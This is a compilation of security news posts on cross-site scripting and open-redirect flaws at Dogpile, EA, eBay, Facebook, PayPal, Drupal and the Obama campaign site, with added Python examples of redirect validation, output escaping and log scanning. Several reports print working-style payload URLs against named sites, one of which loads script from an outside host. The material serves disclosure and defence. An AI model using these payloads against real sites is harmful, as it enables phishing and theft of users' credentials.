Over the last few months, endless malware campaigns have abused Google and DoubleClick redirect links in their spam. Clicking on such a safe-looking link results in a redirection to a malware hosting site and an infection of the user’s Windows machine.

Even though it took Google some time to close this redirection, the malware authors have successfully switched to a Dogpile.com redirection vulnerability. Here is an example of the Dogpile.com cross-site scripting vulnerability that allows redirection of visitors who click a link originating from the dogpile.com domain:
http://www.dogpile.com/clickserver/_iceUrlFlag=1?rawURL=http://CNN.com&0=
Clicking on this link is safe; it will just redirect you to CNN.com. Malware authors are actively using this redirection to infect users by sending them confusing, safe-looking links to exploit hosting sites. The sad thing is that another redirection vulnerability on Dogpile was discovered and reported back in November 2007. It is still unfixed.
Google has done quite a bit to fix the redirection problem, and Dogpile should also fix it soon (hopefully), but the party will just move on to a different location. A good example is a redirection vulnerability on Devicelock.com, reported by XSSed and still unfixed.
DeviceLock, Inc. is a “worldwide leader in endpoint device control security” and on their website they offer a security solution that prevents unauthorized access to USB devices. They proudly use a Content Management System (CMS) called Bitrix, and here is the redirection example on their website:
Let’s say an average user receives an email with a link like the one above. The email says that he has won some free DeviceLock promotional product and all he needs to do to claim it is click that link. The user clicks the link, is redirected to a malware hosting site, and another Windows machine probably gets infected. Although the number of popular and trusted domains is limited, it seems malware spam will contain various redirection links for a long time.
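The fix these redirect abuses call for is server-side validation of the destination parameter (rawURL in the Dogpile link above) against the site's own hosts. The following is an added Python example, not code from Dogpile, Google or DeviceLock; the host names in the allow-list are assumptions.

```python
from urllib.parse import urlsplit

# Hypothetical redirect endpoint's own host names (assumed for this example).
SITE_HOST = "www.example-search.com"
ALLOWED_HOSTS = {SITE_HOST, "ads.example-search.com"}


def safe_redirect_target(raw_url: str, fallback: str = "/") -> str:
    """Return raw_url only if it stays on an allow-listed host, else fallback.

    An open redirect such as ?rawURL=http://CNN.com accepts any absolute URL.
    This check rejects external hosts, scheme-relative URLs (//host),
    backslash tricks (/\\host), non-http(s) schemes and userinfo
    (https://trusted@evil), all of which a browser would happily follow.
    """
    raw_url = (raw_url or "").strip()
    if not raw_url or "\\" in raw_url:
        return fallback
    try:
        parts = urlsplit(raw_url)
    except ValueError:  # e.g. a malformed IPv6 literal
        return fallback
    # A rooted relative path (/results?q=...) stays on this site; note that
    # "//host" parses with a netloc, so it does not take this branch.
    if not parts.scheme and not parts.netloc:
        return raw_url if raw_url.startswith("/") else fallback
    if parts.scheme not in ("http", "https"):
        return fallback
    if parts.username is not None or parts.password is not None:
        return fallback
    host = (parts.hostname or "").lower()
    return raw_url if host in ALLOWED_HOSTS else fallback


if __name__ == "__main__":
    # The destination from the Dogpile link above is external, so it is dropped.
    print(safe_redirect_target("http://CNN.com"))          # -> /
    print(safe_redirect_target("/results?q=usb+security"))  # -> /results?q=usb+security
```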
Multiple cross-site scripting (XSS) vulnerabilities threaten Electronic Arts (EA) gamers due to flaws on the EA main website and numerous subdomains, which include the profile and customer support areas. Malicious users might initiate a series of phishing attacks, spam fake links and use these flaws to steal sensitive personal data such as authentication and payment credentials and game account passwords, and also infect PCs with malware.
Although EA is a TRUSTe (truste.org) certified customer, there are old unfixed flaws that were reported long ago. TRUSTe is an independent website privacy monitor and its seal is supposed to assure EA users of the safety and security of their personal data.
Vulnerable EA websites include:
ea.com: http://www.ea.com/official/godfather/godfather/us/scripts/sound_js.inc?page="><script>alert('XSS')</script>
ea.com #2: http://www.ea.com/prostreet/home.jsp?locale=us%22%3E%3Cscript%3Ealert(%22XSS%22)%3C/script%3E
customersupport.ea.com: http://customersupport.ea.com/loginapp/login.do?curl="><script>alert(/xss/)</script>
profile.ea.com: https://profile.ea.com/login.do?surl=%22%3E%3Cscript%3Ealert(/XSS/)%3C/script%3E%3Cp
findgames.ea.com: http://findgames.ea.com/?search=%22%3E%3Ciframe%20src=http://xssed.com%3E
thesims2.ea.com: http://thesims2.ea.com/exchange/object_detail.php?hideFramework=%22%3E%3Cscript%3Ealert(%22The%20Milk%20Man%22)%3C/script%3E%3CMARQUEE%3E%3Cimg%20src=http://somesite.com/somepic.jpg%3E%3C/marquee%3E
profile.ea.com: POST action=
(raw URL-encoded form body omitted)
Based on reports from XSSed. Credit for discovering and reporting these vulnerabilities to XSSed goes to: Shocker<-at->ShockingSoft.com, C1c4Tr1Z, mox, koolkeith12345, The Milk Man, x2Fusion, Arham Muhammad and Harry Sintonen.
Clarification (June 10): TRUSTe ensures certified privacy rather than protection against hacking or XSS. Consumers are able to rely on the TRUSTe certification and TRUSTe dispute resolution for any privacy issues they are having on websites that bear the TRUSTe seal. Security vulnerabilities fall outside the scope of what TRUSTe monitors.
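The EA findings above are classic reflected XSS: a query parameter such as page or search is echoed into the HTML without being encoded for the context it lands in. The following is an added Python example, not EA's code, showing a vulnerable template beside its hardened form; the parameter names follow the report, while the markup and the payload strings are constructed.

```python
import html
import re
from urllib.parse import quote

# Constructed payloads shaped like the ones XSSed reported against ea.com.
PAGE_PAYLOAD = "\"><script>alert('XSS')</script>"
SEARCH_PAYLOAD = '"><iframe src=http://xssed.com>'


def render_vulnerable(page: str, search: str) -> str:
    # Reflects both parameters verbatim. The leading "> closes the quoted
    # attribute and the rest of the value is parsed as live markup.
    return (f'<input type="hidden" name="page" value="{page}">\n'
            f'<p>Results for {search}</p>\n'
            f'<a href="/?search={search}">Next page</a>')


def render_hardened(page: str, search: str) -> str:
    # Encode for the context each value lands in: html.escape(quote=True)
    # turns & < > " ' into entities for attribute values and text nodes;
    # quote(safe="") percent-encodes a value that is placed inside a URL.
    attr = html.escape(page, quote=True)
    text = html.escape(search, quote=True)
    url_value = quote(search, safe="")
    return (f'<input type="hidden" name="page" value="{attr}">\n'
            f'<p>Results for {text}</p>\n'
            f'<a href="/?search={url_value}">Next page</a>')


LIVE_TAG = re.compile(r"<\s*(script|iframe)\b", re.I)


def contains_live_tag(markup: str) -> bool:
    """Demo check: does the rendered HTML contain an un-encoded script or iframe tag?"""
    return LIVE_TAG.search(markup) is not None


if __name__ == "__main__":
    print(contains_live_tag(render_vulnerable(PAGE_PAYLOAD, SEARCH_PAYLOAD)))  # True
    print(contains_live_tag(render_hardened(PAGE_PAYLOAD, SEARCH_PAYLOAD)))   # False
```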
According to an XSSed report, eBay is vulnerable to cross-site scripting (XSS) that might be abused by scammers in order to take advantage of eBay user accounts. JavaScript code injection can redirect users to fake phishing pages where they are asked to log in to their account. Victims who click on what appears to be a genuine eBay search result are also vulnerable to malware infection.
Among the affected domains are:
motors.desc.shop.ebay.com
shop.ebay.com
search.express.ebay.com
motors.shop.ebay.com
Last year’s cross-site scripting vulnerability on eBay could trick people into handing over their personal information to scammers. eBay promptly patched the flaw, but experts wondered how long the fix would hold. The previous flaw was exactly the same and allowed a scammer to use this type of attack to redirect people from an eBay listing to a spoofed eBay site. A year ago experts said that hackers could easily modify the JavaScript code to once again trigger the same behavior, and it seems they were right.
Here is the vulnerability example from XSSed:
<SCRIPT>if (top == window) location.href = 'http://www.any-domain.com'</SCRIPT>
The XSS issues were submitted to XSSed by S_e_YM_e_N, Azat Harutyunyan, www.r3t.n3t.nl and Uber0n.
The vulnerability was already reported to eBay but currently remains unfixed.
According to XSSed, Facebook is vulnerable to a cross-site scripting flaw that leaves its users at risk from scripting attacks and login phishing. The security blog has posted a proof-of-concept demo of a flaw on the social networking website that could leave surfers vulnerable to malware. Attackers can also trick users into handing over their credentials through fake logins served up from third-party sites.
Here is a harmless proof of concept, shown at XSSed:
http://www.facebook.com/jobs/position.php?st=%3CSCRIPT%20SRC=//ha.ckers.org/.j%3E
Security watchers say that malware authors, spammers and scammers are paying increasing attention to social networking websites. This recent Facebook vulnerability comes shortly after the cross-site scripting exposure on Paypal.com.
Additional warnings of this kind of vulnerability come as network security firm Sophos detected a 419 scam email on business-focused social networking site LinkedIn earlier this week.
At this moment the flaw is still open. Facebook has already been notified of the vulnerability.
Update (May 27): Facebook has fixed this vulnerability a couple of days ago.
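From the defender's side, the encoded payload shape shared by the EA, eBay and Facebook reports (%22%3E%3Cscript..., %3CSCRIPT%20SRC=...) is easy to spot in web server logs. The following is an added Python example, not from XSSed or any of the sites named; the log lines are constructed, with paths and parameter names taken from the reports and made-up client addresses.

```python
import re
from urllib.parse import parse_qsl, unquote, urlsplit

# Constructed access-log lines (combined log format). Paths and parameter
# names follow the XSSed reports above; client addresses and sizes are made up.
SAMPLE_LOG = """\
10.0.0.5 - - [12/May/2008:10:01:02 +0000] "GET /exchange/object_detail.php?hideFramework=home HTTP/1.1" 200 5120
10.0.0.7 - - [12/May/2008:10:01:09 +0000] "GET /prostreet/home.jsp?locale=us%22%3E%3Cscript%3Ealert(%22XSS%22)%3C/script%3E HTTP/1.1" 200 3100
10.0.0.9 - - [12/May/2008:10:02:15 +0000] "GET /jobs/position.php?st=%3CSCRIPT%20SRC=//ha.ckers.org/.j%3E HTTP/1.1" 200 2800
10.0.0.9 - - [12/May/2008:10:02:40 +0000] "GET /?search=%2522%253E%253Ciframe%2520src=http://xssed.com%253E HTTP/1.1" 200 2800
"""

REQUEST_LINE = re.compile(r'"(?:GET|POST) (\S+) HTTP/')
# Tag names seen in the reports: an opening '<', optional '/', then the name.
INJECTED_TAG = re.compile(r"<\s*/?\s*(script|iframe|img|marquee)\b", re.I)


def fully_decode(value: str, rounds: int = 3) -> str:
    """Percent-decode until stable: double encoding (%2522 -> %22 -> ") is a
    common filter-evasion trick, so a single pass is not enough."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def suspicious_params(request_target: str) -> list:
    """Return (name, decoded_value) pairs for query parameters carrying a tag."""
    hits = []
    for name, value in parse_qsl(urlsplit(request_target).query, keep_blank_values=True):
        decoded = fully_decode(value)  # parse_qsl already removed one layer
        if INJECTED_TAG.search(decoded):
            hits.append((name, decoded))
    return hits


def scan_log(text: str) -> list:
    """One alert per request whose query string carries injected markup."""
    alerts = []
    for line in text.splitlines():
        match = REQUEST_LINE.search(line)
        if not match:
            continue
        hits = suspicious_params(match.group(1))
        if hits:
            alerts.append({"client": line.split()[0],
                           "target": match.group(1), "params": hits})
    return alerts
```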
A cross-site scripting (XSS) vulnerability has been found on the website of PayPal, an online payment processing firm. The vulnerability allows arbitrary script execution in the visitor’s browser and could be used in a phishing attack to gather data from unsuspecting users.
The vulnerability allows a malicious attacker to construct a new page which will appear to be on the paypal.com domain name. This fraudulent page could imitate the PayPal login page and harvest account details. Attackers could carry out highly believable attacks by adding their own content to the site and misleading unsuspecting users.
According to Netcraft, the vulnerability is made worse by the fact that the affected page uses an Extended Validation SSL certificate, which causes the browser’s address bar to turn green, assuring visitors that the site belongs to PayPal. Two years ago, a similar vulnerability was discovered on a different page of the PayPal site, which also used an SSL certificate.
This vulnerability was discovered a month after PayPal published a new approach to managing phishing: browsers that do not support EV certificates are to be considered unsafe, and customers who access the PayPal website using such browsers will be blocked.
The vulnerability has been reported to PayPal.
The Drupal Localizer and Internationalization modules are prone to multiple cross-site scripting vulnerabilities because the software fails to sufficiently sanitize user-supplied input. The Internationalization module is also prone to cross-site request forgery attacks while performing node translations.
An attacker may leverage the cross-site scripting issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks. The attacker can exploit the cross-site request forgery issue by tricking a victim into following a specially crafted HTTP request designed to perform some action on the attacker’s behalf using the victim’s currently active session. To exploit these issues, an attacker must entice an unsuspecting victim into following a malicious URI.
The vendor has released updates.
Vulnerable:
Drupal Localizer 5.x 3.3
Drupal Localizer 5.x 2.x-dev
Drupal Localizer 5.x 1.10
Drupal Internationalization 6.x 1.x-dev
Drupal Internationalization 5.x 2.2
Drupal Internationalization 5.x 1.x-dev
Not Vulnerable:
Drupal Localizer 5.x 3.4
Drupal Localizer 5.x 2.1
Drupal Localizer 5.x 1.11
Drupal Internationalization 6.x 1.0-beta1
Drupal Internationalization 5.x 2.3
Drupal Internationalization 5.x 1.1
A cross-site scripting vulnerability in the social networking section of Sen. Barack Obama’s campaign site was exploited over the weekend to redirect users to the URL of his rival, Sen. Hillary Clinton. Cross-site scripting vulnerabilities, which are most commonly exploited by identity thieves and phishers, let attackers inject their own malicious code into legitimate pages. According to the U.K.-based anti-fraud company Netcraft Ltd., someone identified only as “Mox” confessed to the hack in an entry on the Community Blogs section on the Obama site Sunday. Obama, an Illinois Democrat, leads Clinton in the race for the party’s presidential nomination. The site exploit occurred just before this week’s big Pennsylvania primary.
An Obama supporter captured the cross-site scripting hack and the resulting redirect to Clinton’s campaign site on video Saturday, and posted it on YouTube. Clicking on the “Community Blogs” link, the video showed, sent users to hillaryclinton.com.
Additional vulnerabilities were spelled out by Dimitris Pagkalos, a 22-year-old security researcher who co-manages an online archive of sites vulnerable to cross-site scripting attacks. According to Pagkalos, Obama’s site harbors two still-unpatched bugs. Pagkalos also provided more detail on the redirect that Mox implemented over the weekend, noting that the attack used an IFRAME injected into the title parameter of a personal group, another social networking feature of the Obama site, that then let Mox remotely call some malicious JavaScript.
The bug, said Pagkalos, could have been used to infect Obama’s supporters and site visitors with malware, adware or identity-stealing spyware.
Obama’s campaign did not reply to a request for comment. The cross-site scripting bug has been patched.